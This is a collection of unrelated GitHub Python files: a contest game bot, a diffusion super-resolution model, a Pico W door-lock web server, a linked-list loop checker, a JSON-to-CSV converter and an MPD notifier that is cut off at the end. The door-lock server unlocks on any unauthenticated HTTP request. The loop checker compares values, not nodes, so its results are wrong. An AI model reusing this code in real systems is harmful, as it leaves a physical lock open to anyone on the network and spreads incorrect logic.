+{"seq_id":"1288489210","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.13.7\n# ---\n\n# %% tags=[\"soorgeon-imports\"]\nimport json\nimport requests\nfrom exported import search_results, collate_results, main\n\n# %% tags=[\"parameters\"]\nupstream = None\nproduct = None\n\n\n# %% [markdown]\n# ## Search\n\n# %%\ndef search_results(args,kwargs):\n response = requests.get(args,\n kwargs)\n c = response.json()\n search_results = c['hits']['hits']\n return search_results\n","repo_name":"CodeForAfrica/smat_searcher","sub_path":"tasks/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"33436313288","text":"from typing import List, Tuple, Any\n\nfrom src.game_constants import RobotType, Direction, Team, TileState, GameConstants\nfrom src.game_state import GameState, GameInfo\nfrom src.player import Player\n#from bots.aditya import *\nfrom src.map import TileInfo, RobotInfo\nimport random\n\nclass Mining_Logistics:\n def __init__(self, coordinates, direction=None, robots=None):\n self.mining_coordinates = coordinates\n if robots is None:\n self.miners = [] # should just be a list of names\n else:\n self.miners = robots\n self.mine2tt = direction # Vector mining location --> terraforming tile direction\n\n self.tt2mine = (-1 * self.mine2tt[0], -1 * self.mine2tt[1])\n self.tt_coordinates = (self.mining_coordinates[0] + self.mine2tt[0], self.mining_coordinates[1] + self.mine2tt[1])\n\nclass BotPlayer(Player):\n \"\"\"\n Players will write a child class that implements (notably the play_turn method)\n \"\"\"\n\n def __init__(self, team: Team):\n self.team = team\n self.mining_assignment = dict() # A dictionary mapping mines to a Mining_Logistics object\n self.charging_spots = []\n self.game_state = None\n return\n\n def no_collision(self, row, col):\n tile = self.game_state.get_map()[row][col]\n return tile.robot is None\n\n def sorted_mines(self, map):\n \"\"\" Input is map object list(list[TileInfo]) \"\"\"\n height, width = len(map), len(map[0])\n mines = []\n for row in map:\n for tile in row:\n if tile and tile.state == TileState.MINING:\n mines.append(tile)\n mines.sort(key=lambda x: - x.mining)\n # mines is sorted in decreasing order of capacity\n return mines\n\n def first_decision(self, map):\n \"\"\" Decide how many miners to start with, and where to place them.\n Returns list of dictionaries, sorted by capacity \"\"\"\n height, width = len(map), len(map[0])\n gmt = 15 # Good Mine Threshold\n\n def get_terra_tile(mine):\n \"\"\" Returns a dictionary with keys (tt, td) = (adjacent terra tile, directions FROM the terra tile) \"\"\"\n x, y = mine.row, mine.col\n D = {}\n for t in Direction:\n p, q = t.value\n nx, ny = x - p, y - q\n if 0 <= nx < height and 0 <= ny < width and map[nx][ny] and map[nx][\n ny].state == TileState.TERRAFORMABLE:\n D['tt'], D['td'] = (nx, ny), t\n return D\n\n M = self.sorted_mines(map)\n decision_list = [] # This is a list of dictionaries with keys tt,td,c : Terra Tile, Terra_to_mine Direction, Count\n\n if len(M) == 1:\n D = get_terra_tile(M[0])\n D['c'] = 2\n decision_list.append(D)\n\n elif len(M) == 2:\n [m1, m2] = M\n D1, D2 = get_terra_tile(m1), get_terra_tile(m2)\n p1, p2 = m1.mining, m2.mining\n c1, c2 = 1 if p1 < gmt else 2, 1 if p2 < gmt else 2\n D1['c'], D2['c'] = c1, c2\n decision_list.append(D1)\n decision_list.append(D2)\n\n elif len(M) == 3:\n [m1, m2, m3] = M\n D1, D2, D3 = get_terra_tile(m1), get_terra_tile(m2), get_terra_tile(m3)\n p1, p2, p3 = m1.mining, m2.mining, m3.mining\n if p2 < gmt:\n if 0.4 * p1 >= 0.6 * p2:\n c1, c2, c3 = 2, 0, 0\n else:\n c1, c2, c3 = 1, 1, 0\n else:\n if 0.4 * p2 >= 0.6 * p3:\n c1, c2, c3 = 2, 2, 0\n else:\n c1, c2, c3 = 2, 1, 1\n D1['c'], D2['c'], D3['c'] = c1, c2, c3\n if c1: decision_list.append(D1)\n if c2: decision_list.append(D2)\n if c3: decision_list.append(D3)\n\n else:\n [m1, m2, m3, m4] = M[:4]\n D1, D2, D3, D4 = get_terra_tile(m1), get_terra_tile(m2), get_terra_tile(m3), get_terra_tile(m4)\n p1, p2, p3, p4 = m1.mining, m2.mining, m3.mining, m4.mining\n if p2 < gmt:\n if 0.4 * p1 >= 0.6 * p2:\n c1, c2, c3, c4 = 2, 0, 0, 0\n else:\n c1, c2, c3, c4 = 1, 1, 0, 0\n else:\n if 
0.4 * p2 >= 0.6 * p3:\n c1, c2, c3, c4 = 2, 2, 0, 0\n elif 0.4 * p1 < 0.6 * p4:\n c1, c2, c3, c4 = 1, 1, 1, 1\n else:\n c1, c2, c3, c4 = 2, 1, 1, 0\n D1['c'], D2['c'], D3['c'], D4['c'] = c1, c2, c3, c4\n if c1: decision_list.append(D1)\n if c2: decision_list.append(D2)\n if c3: decision_list.append(D3)\n if c4: decision_list.append(D4)\n\n return decision_list\n\n def initial_two_turns(self, game_state: GameState) -> None:\n ginfo = game_state.get_info()\n\n initial_mine_list = self.first_decision(ginfo.map)\n # move the robots\n robots = game_state.get_ally_robots()\n for rname, rob in robots.items():\n if rob.type == RobotType.MINER:\n for mine_info in initial_mine_list:\n if (rob.row, rob.col) == mine_info['tt']:\n move_dir = mine_info['td']\n if game_state.can_move_robot(rname, move_dir):\n game_state.move_robot(rname, move_dir)\n if game_state.can_robot_action(rname):\n game_state.robot_action(rname) # action the robots\n\n print(initial_mine_list)\n # spawn robots\n for mine_info in initial_mine_list:\n tt_coordinates = mine_info['tt']\n t_direction = mine_info['td'].value # From TT --> mining location\n m_direction = (-1 * t_direction[0], -1 * t_direction[1]) # From mining location --> TT\n mining_coordinates = (tt_coordinates[0] + t_direction[0], tt_coordinates[1] + t_direction[1])\n\n print(mine_info)\n if ginfo.map[mining_coordinates[0]][mining_coordinates[1]].state != TileState.MINING:\n raise Exception(\"why isn't this a mining tile??\")\n\n if mining_coordinates not in self.mining_assignment.keys():\n self.mining_assignment[mining_coordinates] = Mining_Logistics(coordinates=mining_coordinates, direction=m_direction)\n\n if 2 >= mine_info['c'] > len(self.mining_assignment[mining_coordinates].miners):\n if game_state.can_spawn_robot(RobotType.MINER, tt_coordinates[0], tt_coordinates[1]): # spawn the robots\n new_miner = game_state.spawn_robot(RobotType.MINER, tt_coordinates[0], tt_coordinates[1])\n print(new_miner.name)\n self.mining_assignment[mining_coordinates].mine2tt = (-1 * t_direction[0], -1 * t_direction[1])\n self.mining_assignment[mining_coordinates].miners.append(new_miner.name)\n\n print(self.mining_assignment)\n\n\n def general_mining_turn(self, game_state: GameState, new_mines=None) -> list[tuple[Any, Any]]:\n ginfo = game_state.get_info()\n robots = game_state.get_ally_robots()\n\n #print(self.mining_assignment.keys())\n\n # moving, actioning, or recharging\n for mining_location in self.mining_assignment:\n logistics = self.mining_assignment[mining_location]\n these_robots = logistics.miners\n\n if 1 >= len(these_robots) > 0: # FIX!!!!!!!!!!\n print(these_robots)\n miner = these_robots[0]\n miner_robot_object = robots[miner]\n if (miner_robot_object.row, miner_robot_object.col) == mining_location:\n print(\"MINING: \" + str(ginfo.turn))\n print(\"BATTERY: \" + str(miner_robot_object.battery))\n print()\n if miner_robot_object.battery >= GameConstants.MINER_ACTION_COST:\n game_state.robot_action(miner)\n else:\n if self.no_collision(*logistics.tt_coordinates):\n game_state.move_robot(miner, Direction(logistics.mine2tt))\n elif (miner_robot_object.row, miner_robot_object.col) == logistics.tt_coordinates:\n print(\"CHARGING: \" + str(ginfo.turn))\n if miner_robot_object.battery == GameConstants.INIT_BATTERY:\n if self.no_collision(*logistics.mining_coordinates):\n game_state.move_robot(miner, Direction(logistics.tt2mine))\n else:\n raise Exception(\"Miners aren't in the right place!!\")\n elif len(these_robots) == 2:\n continue\n elif len(these_robots) > 2:\n 
print(len(these_robots))\n raise Exception(\"Way too many robots here...\")\n\n unfinished_mines = []\n # spawning\n if new_mines is None:\n new_mines = []\n\n for mining_location, mine2tt in new_mines:\n self.mining_assignment[mining_location] = Mining_Logistics(coordinates=mining_location, direction=mine2tt)\n row = self.mining_assignment[mining_location].tt_coordinates[0]\n col = self.mining_assignment[mining_location].tt_coordinates[1]\n\n if game_state.can_spawn_robot(RobotType.MINER, row, col):\n new_miner = game_state.spawn_robot(RobotType.MINER, row, col)\n self.mining_assignment[mining_location].miners.append(new_miner.name)\n else:\n unfinished_mines.append((mining_location, mine2tt))\n print(\"Couldn't spawn at \" + str(mining_location))\n\n return unfinished_mines\n\n def terraforming_phase(self):\n ginfo = self.game_state.get_info()\n height, width = len(ginfo.map), len(ginfo.map[0])\n # Move and action the current terraform robots\n robots = self.game_state.get_ally_robots()\n\n # iterate through dictionary of robots\n for rname, rob in robots.items():\n if rob.type == RobotType.TERRAFORMER:\n\n all_dirs = [dir for dir in Direction] # find a good direction\n move_dir = Direction.DOWN_RIGHT\n for dir in all_dirs:\n if self.game_state.can_move_robot(rname, dir) and self.no_collision(rob.row + dir.value[0], rob.col + dir.value[1]):\n move_dir = dir\n\n # check if we can move in this direction\n if self.game_state.can_move_robot(rname, move_dir):\n # try to not collide into robots from our team\n dest_loc = (rob.row + move_dir.value[0], rob.col + move_dir.value[1])\n dest_tile = self.game_state.get_map()[dest_loc[0]][dest_loc[1]]\n if dest_tile.robot is None or dest_tile.robot.team != self.team:\n print(\"here\")\n self.game_state.move_robot(rname, move_dir)\n if self.game_state.can_robot_action(rname):\n self.game_state.robot_action(rname)\n\n # Spawn new terra formers.\n for row in range(height):\n for col in range(width):\n tile = ginfo.map[row][col]\n if tile is not None and tile.terraform > 0:\n if self.game_state.can_spawn_robot(RobotType.TERRAFORMER, row, col):\n self.game_state.spawn_robot(RobotType.TERRAFORMER, row, col)\n\n return\n\n def play_turn(self, game_state: GameState) -> None:\n # get info\n ginfo = game_state.get_info()\n self.game_state = game_state\n\n # Extract information\n\n if ginfo.turn <= 2:\n self.initial_two_turns(game_state)\n else:\n self.general_mining_turn(game_state)\n self.terraforming_phase()\n if ginfo.turn == 200:\n print(len(ginfo.ally_robots))\n\n\n\n","repo_name":"danielhathcock/awap2023","sub_path":"bots/sherry_aditya_bot.py","file_name":"sherry_aditya_bot.py","file_ext":"py","file_size_in_byte":12007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
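`Mining_Logistics` above derives the terraform-tile coordinates and the reverse direction from `mine2tt`; note that its `__init__` dereferences `self.mine2tt[0]` unconditionally, so the `direction=None` default would raise. The vector bookkeeping itself is easy to verify standalone:

```python
mine = (4, 7)                 # example mining coordinates (assumed)
mine2tt = (-1, 0)             # direction mine -> terraform tile
tt = (mine[0] + mine2tt[0], mine[1] + mine2tt[1])
tt2mine = (-mine2tt[0], -mine2tt[1])
# Walking there and back lands on the mine again.
assert (tt[0] + tt2mine[0], tt[1] + tt2mine[1]) == mine
```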
+{"seq_id":"69962799761","text":"import torch\nimport torch.nn as nn\nfrom unet import UNetModel\nfrom autoencoder import Autoencoder, Encoder, Decoder\nfrom vector_quantize_pytorch import FSQ\nfrom ddim import DDIMSampler\nfrom latent_diffusion import LatentDiffusion\nfrom clip_embedder import CLIPTextEmbedder\nimport torch.nn.functional as F\nfrom util import save_images, load_img\n\n\nclass SRQuantization(nn.Module):\n def __init__(self, ddim_steps: int = 50):\n super().__init__()\n self.unet = UNetModel(in_channels=4,\n out_channels=4,\n channels=320,\n attention_levels=[0, 1, 2],\n n_res_blocks=2,\n channel_multipliers=[1, 2, 4, 4],\n n_heads=8,\n tf_layers=1,\n d_cond=768)\n self.levels_before = [8, 6, 5] # this is for 3-dimension image, if 4-diemsion, set to [8, 5, 5, 5]\n\n self.quantizer_before = FSQ(self.levels_before)\n self.encoder = Encoder(z_channels=4,\n in_channels=3,\n channels=128,\n channel_multipliers=[1, 2, 4, 4],\n n_resnet_blocks=2)\n\n self.levels_after = [8, 5, 5, 5] # this is for 4-dimension image, if 3-diemsion, set to [8, 6, 5]\n self.quantizer_after = FSQ(self.levels_after)\n self.decoder = Decoder(out_channels=3,\n z_channels=4,\n channels=128,\n channel_multipliers=[1, 2, 4, 4],\n n_resnet_blocks=2)\n\n self.autoencoder = Autoencoder(emb_channels=4,\n encoder=self.encoder,\n decoder=self.decoder,\n z_channels=4)\n self.clip_text_embedder = CLIPTextEmbedder()\n\n self.latent_diffusion = LatentDiffusion(unet_model=self.unet,\n autoencoder=self.autoencoder,\n clip_embedder=self.clip_text_embedder,\n linear_start=0.00085,\n linear_end=0.0120,\n n_steps=1000,\n latent_scaling_factor=0.18215)\n self.sampler = DDIMSampler(self.latent_diffusion, n_steps=ddim_steps)\n self.device = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n self.ddim_steps = ddim_steps\n\n def forward(self, lr, uncond_scale: float = 1.0, strength: float = 0.9999):\n lr_up = F.interpolate(lr, mode='bicubic', scale_factor=4)\n b, c, h, w = lr_up.shape\n assert (h, w) == (512, 512), f'h and w must equal to 512, but got h={h}, w={w}'\n prompt = ''\n # Make a batch of prompts\n prompts = b * [prompt]\n\n # Load image\n orig_image = lr_up.to(self.device)\n # # transform lr_up to 3D data to satisfy the input size of quantizer\n # orig_q = orig_image.permute(0, 2, 3, 1).contiguous().view(b, -1, c) # (b, h, w, c)->(b, h*w, c)\n # # Finite-Scalar Quatization\n # orig_image_quantized, _ = self.quantizer_before(orig_q)\n # # transform orig_image_quantized back to orig_image's size\n # orig_image_quantized = orig_image_quantized.view(b, h, w, c).permute(0, 3, 1, 2)\n\n # Encode the image in the latent space and make `batch_size` copies of it\n orig = self.latent_diffusion.autoencoder_encode(orig_image).repeat(b, 1, 1, 1)\n\n # Get the number of steps to diffuse the original\n assert 0. 
<= strength <= 1., 'can only work with strength in [0.0, 1.0]'\n t_index = int(strength * self.ddim_steps)\n # # AMP auto casting\n # with torch.cuda.amp.autocast():\n # In unconditional scaling is not $1$ get the embeddings for empty prompts (no conditioning).\n if uncond_scale != 1.0:\n un_cond = self.latent_diffusion.get_text_conditioning(b * [\"\"])\n else:\n un_cond = None\n # Get the prompt embeddings\n cond = self.latent_diffusion.get_text_conditioning(prompts)\n\n # Add noise to the original image\n x = self.sampler.q_sample(orig, t_index)\n # Reconstruct from the noisy image\n x = self.sampler.paint(x, cond, t_index,\n uncond_scale=uncond_scale,\n uncond_cond=un_cond)\n # Decode the image from the [autoencoder](../model/autoencoder.html)\n # # transform x to 3D data to satisfy the input size of quantizer\n # bx, cx, hx, wx = x.shape\n # x_q = x.permute(0, 2, 3, 1).contiguous().view(bx, -1, cx) # (bx, hx, wx, cx)->(bx, hx*wx, cx)\n # # Finite-Scalar Quatization\n # x_quantized, _ = self.quantizer_after(x_q)\n # # transform x_quantized back to x's size\n # x_quantized = x_quantized.view(bx, hx, wx, cx).permute(0, 3, 1, 2)\n hr = self.latent_diffusion.autoencoder_decode(x)\n return hr\n\n def load(self, unet_checkpoint_path: str, auto_encoder_checkpoint_path: str):\n self.unet.load_state_dict(torch.load(unet_checkpoint_path))\n # self.autoencoder.load_state_dict(torch.load(auto_encoder_checkpoint_path))\n\n self.unet.requires_grad_(False)\n # self.autoencoder.requires_grad_(False)\n self.clip_text_embedder.requires_grad_(False)\n\n# model = SRQuantization().to('cuda:0')\n# model.load(unet_checkpoint_path='E:/AI/checkpoints/stable-diffusion-v-1-4-original/sd-v1-4-unet.ckpt',\n# auto_encoder_checkpoint_path='E:/AI/checkpoints/stable-diffusion-v-1-4-original/sd-v1-4-auto-encoder.ckpt')\n# lr = load_img('D:/Materials/dataset/DIV2K 2018/DIV2K_valid_LR_unknown_X4_sub/0855_s018.png')\n# hr = model(lr)\n# save_images(hr, dest_path='outputs', prefix='sr_img_')\n# levels = [8,5,5,5] # see 4.1 and A.4.1 in the paper\n# quantizer = FSQ(levels)\n#\n#\n#\n# x = torch.randn(1, 1024, 4) # 4 since there are 4 levels\n# xhat, indices = quantizer(x)\n#\n# print(xhat.shape) # (1, 1024, 4) - (batch, seq, dim)\n# print(indices.shape) # (1, 1024) - (batch, seq)\n#\n# assert xhat.shape == x.shape\n# assert torch.all(xhat == quantizer.indices_to_codes(indices))\n","repo_name":"safeanimal/Deep-learning-exercises","sub_path":"personal implementation/StableDiffusion/sr_quantization.py","file_name":"sr_quantization.py","file_ext":"py","file_size_in_byte":6429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10443099890","text":"import config\nimport network\nimport socket\nfrom utime import sleep_ms, ticks_us, ticks_diff\nfrom uselect import select\nfrom machine import Pin\n\n \n#Set up pins\nRELAY_PIN=16\n\n#Pulse length in ms\nPULSE_LENGTH=500\n\n#States\nTARGET_LOCK_STATE_UNSECURED=0\nTARGET_LOCK_STATE_SECURED=1\n\nCURRENT_LOCK_STATE_UNSECURED = 0\nCURRENT_LOCK_STATE_SECURED = 1\nCURRENT_LOCK_STATE_JAMMED = 2\nCURRENT_LOCK_STATE_UNKNOWN = 3\n\n#Config\nREBOOT_AFTER_SECONDS=60*60*12 #12 hours\nREBOOT_AFTER_SECONDS_IF_NO_WIFI=120 #1 minute\n\n\n#Setup pins for relay and sensors\nrelay = Pin(RELAY_PIN, Pin.OUT)\nwifi = network.WLAN(network.STA_IF)\n\n#Global statuses\ntargetState=TARGET_LOCK_STATE_SECURED\ncurrentState=CURRENT_LOCK_STATE_SECURED\n\ndef connectWifi():\n global wlan\n\n wifi = network.WLAN(network.STA_IF)\n wifi.active(True)\n wifi.connect(config.ssid, config.password)\n\n max_wait = 10\n \n wifiStartTime = ticks_us()\n while wifi.status() != 3:\n wifiElapsedTimeS = round(ticks_diff(ticks_us(), wifiStartTime) / 1000000.0)\n print(\"Waiting for connection for: {} seconds\".format(wifiElapsedTimeS))\n \n if wifiElapsedTimeS >= REBOOT_AFTER_SECONDS_IF_NO_WIFI:\n print(\"Rebooting...\")\n sleep_ms(200)\n machine.reset()\n\n print('Wifi status: '+str(wifi.status()))\n sleep_ms(1000)\n\n print('connected')\n status = wifi.ifconfig()\n ipAddress=status[0]\n print( 'ip = ' + ipAddress )\n\nconnectWifi()\n\n#Set up socket and start listening on port 80\naddr = socket.getaddrinfo(wifi.ifconfig()[0], 80)[0][-1]\ns = socket.socket()\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind(addr)\ns.listen(1)\n\nprint('listening on', addr)\n\ndef unlockDoor():\n print('unlockDoor')\n setTargetState(TARGET_LOCK_STATE_UNSECURED)\n# setCurrentState(CURRENT_LOCK_STATE_UNSECURED)\n relay.value(1)\n sleep_ms(PULSE_LENGTH)\n relay.value(0)\n\n retval=getLockStates()\n\n setTargetState(TARGET_LOCK_STATE_SECURED)\n setCurrentState(CURRENT_LOCK_STATE_SECURED)\n\n return retval\n\ndef lockDoor(): \n print('lockDoor')\n setTargetState(TARGET_LOCK_STATE_SECURED)\n setCurrentState(CURRENT_LOCK_STATE_SECURED)\n return getLockStates()\n\ndef returnError(errcode):\n return '{\"success\": false, \"error\": \"'+errcode+'\"}'\n\ndef getLockStates():\n print('getLockStates')\n global targetState\n global currentState\n\n return '{\"success\": true, \"currentState\": '+str(currentState)+', \"targetState\": '+str(targetState)+'}'\n\ndef setTargetState(state):\n global targetState\n \n if(state==TARGET_LOCK_STATE_UNSECURED):\n targetState=TARGET_LOCK_STATE_UNSECURED\n else:\n targetState=TARGET_LOCK_STATE_SECURED\n \ndef setCurrentState(state):\n global currentState\n \n if(state==CURRENT_LOCK_STATE_UNSECURED):\n currentState=CURRENT_LOCK_STATE_UNSECURED\n else:\n currentState=CURRENT_LOCK_STATE_SECURED\n\n#Handle an incoming request\ndef handleRequest(conn, address):\n print('Got a connection from %s' % str(addr))\n request = conn.recv(1024)\n request = str(request)\n\n print(request)\n\n if request.find('/?unlock')==6:\n response=unlockDoor()\n elif request.find('/?lock')==6:\n response=lockDoor()\n elif request.find('/?getstatus')==6:\n response=getLockStates()\n else:\n response=returnError('UNKNOWN_COMMAND')\n\n print(response)\n\n conn.send('HTTP/1.0 200 OK\\r\\nContent-type: application/json\\r\\n\\r\\n')\n conn.send(response)\n conn.close()\n\n#Main Loop\nstartTime = ticks_us()\n\nwhile True:\n elapsedTimeS = round(ticks_diff(ticks_us(), startTime) / 1000000.0)\n print(\"Elapsed time: {} 
seconds\".format(elapsedTimeS))\n \n if elapsedTimeS >= REBOOT_AFTER_SECONDS:\n print(\"Rebooting...\")\n sleep_ms(200)\n machine.reset()\n\n #Check if wifi is connected, if not, reconnect\n if wifi.isconnected() == False:\n print('Connecting wifi...')\n connectWifi()\n\n print('Wifi connected.')\n #Handle incoming HTTP requests in a non-blocking way\n r, w, err = select((s,), (), (), 1)\n\n #Is there an incoming request? If so, handle the request\n if r:\n for readable in r:\n conn, addr = s.accept()\n try:\n handleRequest(conn, addr)\n except OSError as e:\n pass\n\n","repo_name":"mannbro/PiPicoWHomekitDoorLock","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"18085077847","text":"import torch.nn as nn\nimport torch\nimport torch.utils.model_zoo as model_zoo\nfrom torch.utils.data.dataset import Dataset\nimport datetime\nimport cv2\nimport sys\nimport os\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import RandomSampler\nfrom torch.autograd import Variable\n\n__all__ = ['AlexNet', 'alexnet']\n\n\nmodel_urls = {\n 'alexnet': 'https://download.pytorch.org/models/alexnet-owt-4df8aa71.pth',\n}\n\nclass Rand_num(Dataset):\n def __init__(self):\n dirs = []\n self.label = []\n for i in range(3):\n dirs.append(sorted(os.listdir(\"data/largedataset/\"+str(i))))\n length = len(dirs[i])\n self.label.append(np.ones(length)*i)\n for i in range(3):\n for j in range(len(dirs[i])):\n dirs[i][j] = os.path.join(\"data/largedataset/\"+str(i),dirs[i][j])\n self.directories = np.concatenate((dirs[0],dirs[1],dirs[2]))\n self.label = np.concatenate((self.label[0], self.label[1], self.label[2]))\n assert len(self.directories) == len(self.label)\n\n def __getitem__(self, index):\n dirs = self.directories[index]\n data = []\n for element in sorted(os.listdir(dirs)):\n dirs_mod = os.path.join(dirs,element)\n img=cv2.imread(dirs_mod,1)\n img=cv2.resize(img,None,fx=227.0/480, fy=227.0/270, interpolation = cv2.INTER_CUBIC)\n data.append(np.swapaxes(np.swapaxes(img, 2, 1), 1, 0))\n return np.array(data), self.label[index]\n\n def __len__(self):\n return len(self.directories)\n\nclass AlexNet(nn.Module):\n\n def __init__(self, num_classes=1000):\n super(AlexNet, self).__init__()\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(64, 192, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(192, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(256 * 6 * 6, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n nn.Linear(4096, num_classes),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), 256 * 6 * 6)\n x = self.classifier(x)\n return x\n\n\ndef alexnet(pretrained=False, **kwargs):\n r\"\"\"AlexNet model architecture from the\n `\"One weird trick...\" `_ paper.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = AlexNet(**kwargs)\n if pretrained:\n model.load_state_dict(model_zoo.load_url(model_urls['alexnet']))\n return model\n\nif __name__ == '__main__':\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n torch.backends.cudnn.benchmark = True\n net = alexnet(pretrained = True)\n net.cuda()\n dataset = Rand_num()\n sampler = RandomSampler(dataset)\n loader = DataLoader(dataset, batch_size = 1, sampler = sampler, shuffle = False, num_workers=2)\n\n for i, data in enumerate(loader, 0):\n print(i)\n video, labels = data\n# labels = torch.squeeze(Variable(labels.long().cuda()))\n video = torch.squeeze(Variable((video.float()/256).cuda()))\n net.train()\n outputs = net.forward(video)\n o = outputs.data.cpu().numpy()\n outdir = './data/largecnndata/'+str(i)+'.csv'\n np.savetxt(outdir, o, fmt='%g', delimiter=',', newline='\\n', header=str(labels.numpy()[0]), footer='', 
comments='')\n","repo_name":"lizeqian/cs534_project","sub_path":"alexnet.py","file_name":"alexnet.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"17004628491","text":"\"\"\" Interview Cake question No. 23 Does this Linked List have a loop?\"\"\"\n\n# A node class implementation\nclass LinkedListNode:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\"\"\" \n Peforms a check through the list with two pointers, one moves one node at a time, the other one two at a time,\n if they ever cross the same value, it means that the fast pointer 'catched up' to the slow one, meaning that the linked list \n loops\n\"\"\"\ndef hasLoop(linkedListNode):\n runnerFast = linkedListNode.next.next\n runnerSlow = linkedListNode.next\n\n runnerSlowGoes = False\n while(runnerFast.value != runnerSlow.value):\n # print(\"Slow at \",runnerSlow.value)\n # print(\"Fast at \",runnerFast.value)\n if(runnerFast.next == None):\n print(\"List is none looping\")\n break\n if(runnerSlowGoes):\n runnerSlow = runnerSlow.next\n runnerSlowGoes = False\n else:\n runnerSlowGoes = True\n runnerFast = runnerFast.next\n if(runnerFast.value == runnerSlow.value):\n print(\"List had a loop\")\n\n\n#Creating a linkedlist with a loop to the first node\ndef test1():\n list = LinkedListNode(1)\n list.next = LinkedListNode(2)\n list.next.next = LinkedListNode(3)\n list.next.next.next = list\n hasLoop(list)\n#Creating a linkedlist with no loop\ntest1()\ndef test2():\n list = LinkedListNode(1)\n list.next = LinkedListNode(2)\n list.next.next = LinkedListNode(3)\n hasLoop(list) \ntest2()\n\n#Creating a linkedlist with a loop to the second node\ndef test3():\n list = LinkedListNode(1)\n list.next = LinkedListNode(2)\n list.next.next = LinkedListNode(3)\n list.next.next.next = list.next\n hasLoop(list) \ntest3()\n\n#Creating a linkedlist with a loop to the final node\ndef test4():\n list = LinkedListNode(1)\n list.next = LinkedListNode(2)\n list.next.next = LinkedListNode(3)\n list.next.next.next = list.next.next\n hasLoop(list) \ntest4()","repo_name":"kevuno/MicrosoftInterviewPractice","sub_path":"CircularLinkedList/isLinkedListCircular.py","file_name":"isLinkedListCircular.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"39659628353","text":"import requests\r\nimport json\r\nimport csv\r\n\r\ndef fetch_json_data(api_url):\r\n try:\r\n response = requests.get(api_url)\r\n response.raise_for_status()\r\n json_data = response.json()\r\n return json_data\r\n except requests.exceptions.HTTPError as e:\r\n print(f\"Error fetching JSON data from API: {e}\")\r\n return None\r\n\r\ndef get_csv_header(json_data):\r\n if isinstance(json_data, list) and json_data:\r\n return list(json_data[0].keys())\r\n elif isinstance(json_data, dict):\r\n return list(json_data.keys())\r\n else:\r\n return []\r\n\r\ndef write_csv_file(json_data, csv_file_path):\r\n header = get_csv_header(json_data)\r\n\r\n with open(csv_file_path, 'w', newline='', encoding='utf-8') as csvfile:\r\n csv_writer = csv.DictWriter(csvfile, fieldnames=header)\r\n csv_writer.writeheader()\r\n\r\n if isinstance(json_data, list):\r\n for item in json_data:\r\n csv_writer.writerow(item)\r\n elif isinstance(json_data, dict):\r\n csv_writer.writerow(json_data)\r\n\r\ndef json_to_csv(api_url, csv_file_path):\r\n json_data = fetch_json_data(api_url)\r\n if json_data:\r\n write_csv_file(json_data, csv_file_path)\r\n\r\nif __name__ == '__main__':\r\n # Example usage\r\n api_url = \"https://api.example.com/data\"\r\n csv_file_path = \"output.csv\"\r\n\r\n json_to_csv(api_url, csv_file_path)\r\n","repo_name":"michaelwnau/striga","sub_path":"app/json_to_csv.py","file_name":"json_to_csv.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"26721446406","text":"import mutagen\nimport os\nimport io\nimport base64\nimport time\nfrom PIL import Image\n\nfrom mpd import MPDClient\n\n\nclass MPD:\n def __init__(self, host, port, music_dir):\n self.host = host\n self.port = port\n self.music_dir = music_dir\n\n self.mpd = MPDClient()\n self.mpd.connect(self.host, self.port)\n\n self.title = self.get_title()\n self.artist = self.get_artist()\n self.album = self.get_album()\n self.file = self.get_file()\n\n def get_state(self):\n return self.mpd.status()[\"state\"]\n\n def get_artist(self):\n return self.mpd.currentsong().get(\"artist\")\n\n def get_album(self):\n return self.mpd.currentsong().get(\"album\")\n\n def get_cover(self):\n file_path = os.path.expanduser(os.path.join(self.music_dir, self.file))\n mf = mutagen.File(file_path)\n pictureData = None\n out_path = \"/tmp/mpd-notify.png\"\n\n try:\n if isinstance(mf.tags, mutagen._vorbis.VComment) or isinstance(\n mf, mutagen.ogg.OggFileType\n ):\n artwork_bytes = base64.b64decode(mf[\"metadata_block_picture\"][0])\n picture = mutagen.flac.Picture(artwork_bytes)\n pictureData = io.BytesIO(picture.data)\n\n elif isinstance(mf.tags, mutagen.id3.ID3) or isinstance(\n mf, mutagen.id3.ID3FileType\n ):\n artwork_bytes = mf.tags[\"APIC:\"].data\n pictureData = io.BytesIO(artwork_bytes)\n\n img = Image.open(pictureData)\n img = 